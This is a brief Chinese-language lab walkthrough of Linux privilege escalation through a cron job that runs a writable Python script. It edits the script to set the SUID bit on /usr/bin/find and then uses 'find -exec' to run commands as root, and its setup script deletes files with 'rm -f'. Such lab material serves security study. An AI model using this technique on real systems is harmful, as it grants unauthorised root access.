一、實驗環境
1、在crontab(/etc/crontab)下設置一個新的計划任務來運行一個python腳本,該腳本刪除特定目錄中的所有數據 python腳本#!/usr/bin/env python
import os
import sys
try:
os.system('rm -f /home/kali/clearup/*')
except:
sys.exit()
二、提權准備
1、查看計划任務cat /etc/crontab
2、修改腳本(前提是你得有權限寫)
#!/usr/bin/env python
import os
import sys
try:
#os.system('rm -f /home/kali/clearup/*')
os.system('chmod u+s /usr/bin/find')
except:
sys.exit()
三、等待計划任務執行
ls -alh /usr/bin/find
find abc -exec "whoami" \;